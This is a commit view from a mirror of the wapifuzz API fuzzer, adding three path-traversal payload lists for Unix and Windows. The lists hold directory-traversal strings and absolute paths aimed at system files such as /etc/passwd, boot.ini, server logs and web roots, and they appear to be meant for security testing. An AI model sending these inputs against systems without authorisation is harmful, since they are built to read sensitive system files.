mirror of
https://github.com/ysoftdevs/wapifuzz.git
synced 2026-04-20 07:41:24 +02:00
Folder removed
This commit is contained in:
16
fuzzer/payloads/lists/path-traversal/existing-files-unix.txt
Normal file
16
fuzzer/payloads/lists/path-traversal/existing-files-unix.txt
Normal file
@@ -0,0 +1,16 @@
|
||||
# RELATIVE PATHS
|
||||
../../../../../../../../../../../../../../../../../apache/logs/access.log
|
||||
../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../apache/logs/
|
||||
../../../../../../../../../../../../../../../../../etc/
|
||||
../../../../../../../../../../../../../../../../../opt/
|
||||
../../../../../../../../../../../../../../../../../var/
|
||||
|
||||
|
||||
# ABSOLUTE PATHS
|
||||
/apache/logs/access.log
|
||||
/etc/passwd
|
||||
/apache/logs/
|
||||
/etc/
|
||||
/opt/
|
||||
/var/
|
||||
@@ -0,0 +1,23 @@
|
||||
# RELATIVE PATHS
|
||||
../../../../../../../../../../../../../../../../../boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
|
||||
../../../../../../../../../../../../../../../../../
|
||||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
|
||||
|
||||
../../../../../../../../../../../../../../../../../inetpub/wwwroot/index.asp
|
||||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\index.asp
|
||||
|
||||
../../../../../../../../../../../../../../../../../inetpub/wwwroot/
|
||||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\
|
||||
|
||||
# ABSOLUTE PATHS
|
||||
c:\boot.ini
|
||||
c:\
|
||||
c:\inetpub\wwwroot\index.asp
|
||||
c:\inetpub\
|
||||
c:\pagefile.sys
|
||||
c:\Windows\system.ini
|
||||
c:\Windows\
|
||||
c:\Windows\System32\drivers\etc\hosts
|
||||
c:\Windows\System32\drivers\etc\
|
||||
12
fuzzer/payloads/lists/path-traversal/non-existing-files.txt
Normal file
12
fuzzer/payloads/lists/path-traversal/non-existing-files.txt
Normal file
@@ -0,0 +1,12 @@
|
||||
# Generic relative paths
|
||||
../../../../../../../../../../../../../../../../../unknown/unknown.log
|
||||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\unknown/unknown.log
|
||||
|
||||
../../../../../../../../../../../../../../../../../unknown
|
||||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\unknown
|
||||
|
||||
# Windows absolute paths
|
||||
c:\unknown\unknown
|
||||
|
||||
# UNIX absolute paths
|
||||
/unknown/unknown
|
||||
Reference in New Issue
Block a user